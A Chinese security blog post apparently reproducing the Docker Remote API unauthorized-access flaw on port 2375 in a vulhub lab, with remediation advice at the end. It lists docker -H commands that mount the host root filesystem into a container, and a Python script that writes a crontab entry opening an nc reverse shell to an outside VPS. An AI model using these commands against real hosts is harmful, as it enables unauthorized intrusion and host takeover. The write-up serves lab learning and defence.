<!DOCTYPE html>
<html><head>
<title>Docker Daemon Api 未授权访问漏洞复现</title>




<meta charset="utf-8">
<meta name="X-UA-Compatible" content="IE=edge">
<meta name="google-site-verification" content="">
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
<meta content="telephone=no" name="format-detection">
<meta name="description" content="Chaitin-Writeup-漏洞复现">
<meta name="renderer" content="webkit">
<meta name="theme-color" content="#ffffff">











<script src="/vendor/js/jquery.min.js" ></script>
<script src="/vendor/js/popper.min.js" ></script>
<script src="/vendor/js/bootstrap.min.js" ></script>
<script src="/vendor/js/smooth-scroll.polyfills.min.js" ></script>
<link type="text/css" rel="stylesheet" href="/vendor/css/bootstrap.min.css">
<script src="/vendor/js/vue.min.js" ></script>






<link rel="stylesheet" href="https://b40du.github.io/scss/journal.min.47aa1ffb60880ad8c72feecd6962a14331eca7a7a30e08354a1ca91009b8bc5b.css" integrity="sha256-R6of&#43;2CICtjHL&#43;7NaWKhQzHsp6ejDgg1ShypEAm4vFs=" media="screen">



<link rel="stylesheet" href="https://b40du.github.io/scss/dark-mode.min.b13808e7c98cd5aa981a3822fd3421e26f1015876bb15a3fbf8ed5991c382367.css" integrity="sha256-sTgI58mM1aqYGjgi/TQh4m8QFYdrsVo/v47VmRw4I2c=" media="screen">


<script src="https://b40du.github.io/js/loadCSS.js"></script>
<script>
  loadCSS("https://fonts.googleapis.com/css?family=Lora|Montserrat|Fira+Mono|Noto+Serif+SC|Material+Icons");
</script>




  
    <script src="https://b40du.github.io/js/toc-collapse.js"></script>
  










</head><body>
    	<div id="app"><div ref="sideContainer" class="side-container">
    
    <a class="a-block nav-head false" href="https://b40du.github.io">
    
        <div class="nav-title">
            爆肚的杂货铺
        </div>
        
        <div class="nav-subtitle">
            b40du&#39;s blog
        </div>
        
    </a>

    <div class="nav-link-list">
        
        
            
            
            
                
            
            
            
            <a class="a-block nav-link-item active" href="/posts">
                归档
            </a>
            
        
            
            
            
            
            
            <a class="a-block nav-link-item false" href="/categories">
                分类
            </a>
            
        
            
            
            
            
            
            <a class="a-block nav-link-item false" href="/tags">
                标签
            </a>
            
        
            
            
            
            
            
            <a class="a-block nav-link-item false" href="/about">
                关于
            </a>
            
        
            
            
            
            
            
            <a class="a-block nav-link-item false" href="/index.xml">
                RSS订阅
            </a>
            
        
    </div>

    

    <div class="nav-footer">
        
Hugo Theme <a href="https://github.com/amazingrise/hugo-theme-diary">Diary</a> by <a href="https://amazingrise.net">Rise</a>
<br>
Ported from <a href="https://mak1t0.cc/" target="_blank" rel="noreferrer noopener">Makito</a>'s <a href="https://github.com/SumiMakito/hexo-theme-journal/" target="_blank" rel="noreferrer noopener">Journal.</a> <br>
<br>

&copy;
	
	This is a customized copyright.
	

    </div>
    
</div><div ref="extraContainer" class="extra-container">
    
    
    <div class="toc animated-visibility" :class="{ invisible: scrollY <= 140 }">


	<div class="toc-content">
	
		
		
		
		<center>- CATALOG -</center>
		
		
		<ul>
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#1-%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0" onclick="collapseOthers(`#1-漏洞描述-nav`)" id="1-漏洞描述-nav">
									1. 漏洞描述
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#2-%e6%bc%8f%e6%b4%9e%e6%88%90%e5%9b%a0" onclick="collapseOthers(`#2-漏洞成因-nav`)" id="2-漏洞成因-nav">
									2. 漏洞成因
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#3-%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0" onclick="collapseOthers(`#3-漏洞复现-nav`)" id="3-漏洞复现-nav">
									3. 漏洞复现
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
							
								<ul class="collapse" data-toggle="collapse">
							
						
						
							<li>
								<a href="#31-%e8%bf%9b%e5%85%a5vulhub%e6%bc%8f%e6%b4%9e%e7%9b%ae%e5%bd%95%e5%90%af%e5%8a%a8%e6%bc%8f%e6%b4%9e%e7%8e%af%e5%a2%83" onclick="collapseOthers(`#31-进入vulhub漏洞目录启动漏洞环境-nav`)" id="31-进入vulhub漏洞目录启动漏洞环境-nav">
									3.1 进入vulhub漏洞目录，启动漏洞环境
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#32-%e6%8e%a2%e6%b5%8b2375%e7%ab%af%e5%8f%a3" onclick="collapseOthers(`#32-探测2375端口-nav`)" id="32-探测2375端口-nav">
									3.2 探测2375端口
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#33-%e5%88%a9%e7%94%a8%e6%bc%8f%e6%b4%9e%e6%9f%a5%e7%9c%8b%e9%95%9c%e5%83%8f%e5%88%9b%e9%80%a0%e5%ae%b9%e5%99%a8" onclick="collapseOthers(`#33-利用漏洞查看镜像创造容器-nav`)" id="33-利用漏洞查看镜像创造容器-nav">
									3.3 利用漏洞查看镜像、创造容器
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#34-%e5%88%a9%e7%94%a8%e6%bc%8f%e6%b4%9e%e5%8f%8d%e5%bc%b9shell" onclick="collapseOthers(`#34-利用漏洞反弹shell-nav`)" id="34-利用漏洞反弹shell-nav">
									3.4 利用漏洞反弹shell
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
							
								</ul>
							
						
						
						
							<li>
								<a href="#4-%e6%bc%8f%e6%b4%9e%e5%8d%b1%e5%ae%b3" onclick="collapseOthers(`#4-漏洞危害-nav`)" id="4-漏洞危害-nav">
									4. 漏洞危害
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#5-%e6%bc%8f%e6%b4%9e%e4%bf%ae%e5%a4%8d" onclick="collapseOthers(`#5-漏洞修复-nav`)" id="5-漏洞修复-nav">
									5. 漏洞修复
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#6-%e5%8f%82%e8%80%83%e8%b5%84%e6%96%99" onclick="collapseOthers(`#6-参考资料-nav`)" id="6-参考资料-nav">
									6. 参考资料
								</a>
							</li>
						
						
					
				
			
		</ul>
	</div>

</div>
    
    <div class="pagination">
        <a id="globalBackToTop" class="pagination-action animated-visibility" href="#top" :class="{ invisible: scrollY == 0 }">
            <i class="material-icons pagination-action-icon">
                keyboard_arrow_up
            </i>
        </a>
        
        <a class="pagination-action" v-on:click="toggleDarkMode">
            <i class="material-icons pagination-action-icon" v-if="isDarkMode">
                brightness_4
            </i>
            <i class="material-icons pagination-action-icon" v-else="isDarkMode">
                brightness_7
            </i>
        </a>
        
        
    </div>
</div><div class="single-column-drawer-container" ref="drawer"
     v-bind:class="{ 'single-column-drawer-container-active': isDrawerOpen }">
    <div class="drawer-content">
        <div class="drawer-menu">
            
            
            
                
                
                
                    
                
                
                
                <a class="a-block drawer-menu-item active" href="/posts">
                    归档
                </a>
                
            
                
                
                
                
                
                <a class="a-block drawer-menu-item false" href="/categories">
                    分类
                </a>
                
            
                
                
                
                
                
                <a class="a-block drawer-menu-item false" href="/tags">
                    标签
                </a>
                
            
                
                
                
                
                
                <a class="a-block drawer-menu-item false" href="/about">
                    关于
                </a>
                
            
                
                
                
                
                
                <a class="a-block drawer-menu-item false" href="/index.xml">
                    RSS订阅
                </a>
                
            
            
            <div class="toc">


	<div class="toc-content">
	
		
		
		
		<center>- CATALOG -</center>
		
		
		<ul>
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#1-%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0" onclick="collapseOthers(`#1-漏洞描述-nav`)" id="1-漏洞描述-nav">
									1. 漏洞描述
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#2-%e6%bc%8f%e6%b4%9e%e6%88%90%e5%9b%a0" onclick="collapseOthers(`#2-漏洞成因-nav`)" id="2-漏洞成因-nav">
									2. 漏洞成因
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#3-%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0" onclick="collapseOthers(`#3-漏洞复现-nav`)" id="3-漏洞复现-nav">
									3. 漏洞复现
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
							
								<ul class="collapse" data-toggle="collapse">
							
						
						
							<li>
								<a href="#31-%e8%bf%9b%e5%85%a5vulhub%e6%bc%8f%e6%b4%9e%e7%9b%ae%e5%bd%95%e5%90%af%e5%8a%a8%e6%bc%8f%e6%b4%9e%e7%8e%af%e5%a2%83" onclick="collapseOthers(`#31-进入vulhub漏洞目录启动漏洞环境-nav`)" id="31-进入vulhub漏洞目录启动漏洞环境-nav">
									3.1 进入vulhub漏洞目录，启动漏洞环境
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#32-%e6%8e%a2%e6%b5%8b2375%e7%ab%af%e5%8f%a3" onclick="collapseOthers(`#32-探测2375端口-nav`)" id="32-探测2375端口-nav">
									3.2 探测2375端口
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#33-%e5%88%a9%e7%94%a8%e6%bc%8f%e6%b4%9e%e6%9f%a5%e7%9c%8b%e9%95%9c%e5%83%8f%e5%88%9b%e9%80%a0%e5%ae%b9%e5%99%a8" onclick="collapseOthers(`#33-利用漏洞查看镜像创造容器-nav`)" id="33-利用漏洞查看镜像创造容器-nav">
									3.3 利用漏洞查看镜像、创造容器
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#34-%e5%88%a9%e7%94%a8%e6%bc%8f%e6%b4%9e%e5%8f%8d%e5%bc%b9shell" onclick="collapseOthers(`#34-利用漏洞反弹shell-nav`)" id="34-利用漏洞反弹shell-nav">
									3.4 利用漏洞反弹shell
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
							
								</ul>
							
						
						
						
							<li>
								<a href="#4-%e6%bc%8f%e6%b4%9e%e5%8d%b1%e5%ae%b3" onclick="collapseOthers(`#4-漏洞危害-nav`)" id="4-漏洞危害-nav">
									4. 漏洞危害
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#5-%e6%bc%8f%e6%b4%9e%e4%bf%ae%e5%a4%8d" onclick="collapseOthers(`#5-漏洞修复-nav`)" id="5-漏洞修复-nav">
									5. 漏洞修复
								</a>
							</li>
						
						
					
				
			
				
				
					
						
						
						
						
						
							<li>
								<a href="#6-%e5%8f%82%e8%80%83%e8%b5%84%e6%96%99" onclick="collapseOthers(`#6-参考资料-nav`)" id="6-参考资料-nav">
									6. 参考资料
								</a>
							</li>
						
						
					
				
			
		</ul>
	</div>

</div>
            
        </div>
    </div>
</div>
<transition name="fade">
    <div v-bind:class="{ 'single-column-drawer-mask': mounted }" v-if="isDrawerOpen" v-on:click="toggleDrawer"></div>
</transition>
<nav ref="navBar" class="navbar sticky-top navbar-light single-column-nav-container">
    <div ref="navBackground" class="nav-background"></div>
    <div class="container container-narrow nav-content">
        <button id="nav_dropdown_btn" class="nav-dropdown-toggle" type="button" v-on:click="toggleDrawer">
            <i class="material-icons">
                menu
            </i>
        </button>
        <a ref="navTitle" class="navbar-brand" href="https://b40du.github.io">
            爆肚的杂货铺
        </a>
        
        <button type="button" class="nav-darkmode-toggle" v-on:click="toggleDarkMode">
            <i class="material-icons" v-if="isDarkMode">
                brightness_4
            </i>
            <i class="material-icons" v-else="isDarkMode">
                brightness_7
            </i>
        </button>
        
    </div>
</nav>
<div class="single-column-header-container" ref="pageHead"
     v-bind:style="{ transform: 'translateZ(0px) translateY('+.3*scrollY+'px)', opacity: 1-navOpacity }">
    <a href="https://b40du.github.io">
        <div class="single-column-header-title">爆肚的杂货铺</div>
        
        <div class="single-column-header-subtitle">b40du&#39;s blog</div>
        

    </a>
</div>
            <div id="content">
<div ref="streamContainer" class="stream-container">
    <div class="post-list-container post-list-container-shadow">
        <div class="post">
            
            
            

            <div class="post-head-wrapper-text-only"
                
            >
                <div class="post-title">
                    Docker Daemon Api 未授权访问漏洞复现
                    
                    <div class="post-subtitle">
                        Chaitin-Writeup-漏洞复现
                    </div>
                    
                    <div class="post-meta">
                        
                        <time itemprop="datePublished">
                            2020-07-08 23:55
                        </time>
                        

                        
                            <i class="material-icons" style="">folder</i>
                                <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0">漏洞复现</a>
                                &nbsp;
                        

                        
                            <i class="material-icons" style="">label</i>
                            
                                <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0">漏洞复现</a>
                                &nbsp;
                            
                        
                        
                    </div>
                </div>
            </div>
            
            <div class="post-body-wrapper">
                
                <div class="post-body" v-pre>
                
                    <h1 id="1-漏洞描述">1. 漏洞描述</h1>
<p>Docker是一种开源的应用容器引擎，由于权限设置不当以及端口暴露在外网等原因，可以利用该漏洞访问Docker对外开放的一个API接口，进行远程命令执行。</p>
<h1 id="2-漏洞成因">2. 漏洞成因</h1>
<p>Docker在使用集群管理（如：Kubernetes，swarm）时，要使用<code>remote api</code>对节点进行管理，<code>remote api</code>无认证时的默认端口是2375（需要TLS认证默认登录是2376）。</p>
<p>而<code>remote api</code>默认是可以不需要认证能直接访问，能直接对Docker进行操作，如新建容器，删除容器，查看镜像容器信息等等。</p>
<h1 id="3-漏洞复现">3. 漏洞复现</h1>
<h2 id="31-进入vulhub漏洞目录启动漏洞环境">3.1 进入vulhub漏洞目录，启动漏洞环境</h2>
<p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200711190924.png" alt=""></p>
<p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200711191010.png" alt=""></p>
<h2 id="32-探测2375端口">3.2 探测2375端口</h2>
<p>如果是公网的其他主机，我们需要探测2375端口。</p>
<p>由于是靶场搭建漏洞环境，在这里我们直接访问<code>http://youer-vps-ip:2375/version</code>请求，如果返回包带有<code>json</code>格式，说明存在该漏洞。</p>
<p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708144642.png" alt=""></p>
<h2 id="33-利用漏洞查看镜像创造容器">3.3 利用漏洞查看镜像、创造容器</h2>
<p>在远程<code>vps</code>中，构造如下<code>poc</code>，进行测试：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">docker -H<span style="color:#f92672">=</span>tcp://your-vps-ip:2375 images
</code></pre></div><p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708195346.png" alt=""></p>
<p>然后我们新建一个容器，并将<code>entrypoint</code>设置为<code>/bin/bash</code>或者<code>/bin/sh</code>，挂载点设置为服务器的根目录挂载至<code>/tmp</code>目录下，然后使用<code>ls</code>命令查看。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">docker -H<span style="color:#f92672">=</span>tcp://your-vps-ip:2375 run -it -v /:/tmp --entrypoint /bin/sh alpine:latest
</code></pre></div><p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708195528.png" alt=""></p>
<p>然后使用命令查看所有的容器。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">docker -H<span style="color:#f92672">=</span>tcp://your-vps-ip:2375 ps -a
</code></pre></div><p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708195642.png" alt=""></p>
<h2 id="34-利用漏洞反弹shell">3.4 利用漏洞反弹shell</h2>
<p>我们启动一个容器，并将宿主机的<code>/etc</code>目录挂载到容器中，这个时候我们便已经可以任意读写文件了。接下来我们需要做的就是将命令写入<code>crontab</code>配置文件，进行反弹<code>shell</code>。于是在自己的<code>vps</code>上构造如下<code>poc</code>：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> docker

client <span style="color:#f92672">=</span> docker<span style="color:#f92672">.</span>DockerClient(base_url<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;http://靶场ip:2375/&#39;</span>)
data <span style="color:#f92672">=</span> client<span style="color:#f92672">.</span>containers<span style="color:#f92672">.</span>run(<span style="color:#e6db74">&#39;alpine:latest&#39;</span>, <span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;&#39;&#39;sh -c &#34;echo &#39;*/1 * * * * /usr/bin/nc your-vps-ip 7890 -e /bin/sh&#39; &gt;&gt; /tmp/etc/crontabs/root&#34; &#39;&#39;&#39;</span>, <span style="color:#f92672">+=</span>True, volumes<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#39;/etc&#39;</span>: {<span style="color:#e6db74">&#39;bind&#39;</span>: <span style="color:#e6db74">&#39;/tmp/etc&#39;</span>, <span style="color:#e6db74">&#39;mode&#39;</span>: <span style="color:#e6db74">&#39;rw&#39;</span>}})
</code></pre></div><p>然后同时另外开启一个控制台，使用<code>nc</code>监听<code>7890</code>端口：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">nc -nvvl <span style="color:#ae81ff">7890</span>
</code></pre></div><p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708200245.png" alt=""></p>
<p>然后运行<code>python</code>脚本，监听到靶场ip连接：</p>
<p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708200432.png" alt=""></p>
<p>然后输入命令<code>id</code>：</p>
<p><img src="https://development-bj-01.oss-cn-beijing.aliyuncs.com/PicGo/20200708200558.png" alt=""></p>
<p>成功！</p>
<blockquote>
<p>在这里有个问题就是，poc并不是一成不变的，要根据实际情况进行调整，有的时候是bash有的时候是sh。</p>
<p>另外就是，跟阿杜老师交流的过程中进行了多次复现，又遇到了复现不成功的情况，经过和阿杜老师的交流，发现环境可能有些问题，计划任务不一定可以正常执行，需要先crontab -e 编辑一下，保存退出，然后计划任务就可以被激活。</p>
<p>由于这部分内容尚未深入研究，待有时间对其再次做一些测试。</p>
</blockquote>
<h1 id="4-漏洞危害">4. 漏洞危害</h1>
<ul>
<li>可利用此漏洞，远程命令执行，且很可能逃逸至宿主机</li>
<li>可利用此漏洞，进行<code>crontabs</code>反弹<code>shell</code></li>
</ul>
<h1 id="5-漏洞修复">5. 漏洞修复</h1>
<ul>
<li>增加TLS认证（比较复杂）</li>
<li>在防火墙上配置禁止外网访问<code>2375</code>端口</li>
</ul>
<h1 id="6-参考资料">6. 参考资料</h1>
<ul>
<li>
<p>Docker Daemon Api 未授权访问漏洞</p>
<ul>
<li><a href="https://www.jianshu.com/p/43d86d7ed3a5">https://www.jianshu.com/p/43d86d7ed3a5</a></li>
</ul>
</li>
<li>
<p>Docker Remote API 未授权访问</p>
<ul>
<li>[https://mature-sec.com/post/docker-remote-api-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/](</li>
</ul>
</li>
</ul>

                    
                    <HR width="100%" id="EOF">
		    <p style="color:#777;">Last modified on 2020-07-08</p>
                    
                </div>
            </div>
            
            
            <nav class="post-pagination">

                
                <a class="newer-posts" href="https://b40du.github.io/posts/writeup-chaitin-deserialization-01/">
			Next<br>Typecho反序列化漏洞
                </a>
                
                
                
                <a class="older-posts" href="https://b40du.github.io/posts/writeup-chaitin-business_logic-01/">
			Previous<br>Writeup 之 业务逻辑 魔改flag版
                </a>
                
            </nav>
            <div class="post-comment-wrapper">
                







            </div>
        </div>
    </div>
</div>

            </div><div id="single-column-footer">
Hugo Theme <a href="https://github.com/amazingrise/hugo-theme-diary">Diary</a> by <a href="https://amazingrise.net">Rise</a>
<br>
Ported from <a href="https://mak1t0.cc/" target="_blank" rel="noreferrer noopener">Makito</a>'s <a href="https://github.com/SumiMakito/hexo-theme-journal/" target="_blank" rel="noreferrer noopener">Journal.</a> <br>
<br>

&copy;
	
	This is a customized copyright.
	
</div>
            </div>
    <script>
let app;

app = new Vue({
    el: '#app',
    data: {
        scrollY: 0,
        navOpacity: 0,
        isDrawerOpen: false,
        mounted: false,
        isDarkMode: false
    },
    methods: {
            sgn(t, x) {
                let k = 1. / (1. - 2 * t);
                if (x <= t) return 0;
                else if (x >= 1 - t) return 1;
                else {
                    return k * (x - t);
                }
            },
            handleScroll() {
                this.scrollY = window.scrollY;
                this.navOpacity = this.sgn(.0, Math.min(1, Math.max(0, window.scrollY / (this.pageHeadHeight() - this.navBarHeight() * 0.8))));
                const {navBar, navBackground, navTitle, extraContainer, streamContainer} = this.$refs;

                if (this.navOpacity >= 1) {
                    navBackground.style.opacity = 1;
                    navTitle.style.opacity = 1;
                } else {
                    navBackground.style.opacity = 0;
                    navTitle.style.opacity = 0;
                }
            },
            handleResize() {
                const {navBar, navBackground, navTitle, extraContainer, streamContainer} = this.$refs;
                extraContainer.style.left = (streamContainer.offsetWidth - extraContainer.offsetWidth) + 'px';
            },
            navBarHeight() {
                return this.$refs.navBar.offsetHeight;
            },
            pageHeadHeight() {
                return this.$refs.pageHead.offsetHeight;
            },
            toggleDrawer() {
                this.isDrawerOpen = !this.isDrawerOpen;
                document.getElementsByTagName('html')[0].style.overflow = this.isDrawerOpen ? 'hidden' : 'unset';
            },
            closeDrawer() {
                this.isDrawerOpen = false;
                document.getElementsByTagName('html')[0].style.overflow = this.isDrawerOpen ? 'hidden' : 'unset';
            },
            toggleDarkMode() {
                this.isDarkMode = !this.isDarkMode;
                if (this.isDarkMode==true){
                    document.cookie = "night=1;path=/";
                    document.body.classList.add("night");
                } else {
                    document.cookie = "night=0;path=/";
                    document.body.classList.remove("night");
                }
            }
    },
    created() {
        window.addEventListener('scroll', this.handleScroll);
        window.addEventListener('resize', this.handleResize);
        window._nonDesktop = function () {
            let check = false;
            (function (a) {
                if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true;
            })(navigator.userAgent || navigator.vendor || window.opera);
            return check;
        };
        
        var night = document.cookie.replace(/(?:(?:^|.*;\s*)night\s*\=\s*([^;]*).*$)|^.*$/, "$1");
        if (night==""){
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                
            }
        }else{
            
            if (night=="1") {
                this.toggleDarkMode();
            }
        }
    },
    mounted() {
        this.handleScroll();
        this.handleResize();
        this.mounted = true;

        
    },
    destroyed() {
        window.removeEventListener('scroll', this.handleScroll);
        window.removeEventListener('resize', this.handleResize);
    }
});
</script>

<script src="https://b40du.github.io/js/journal.js"></script>
    </body>
</html>
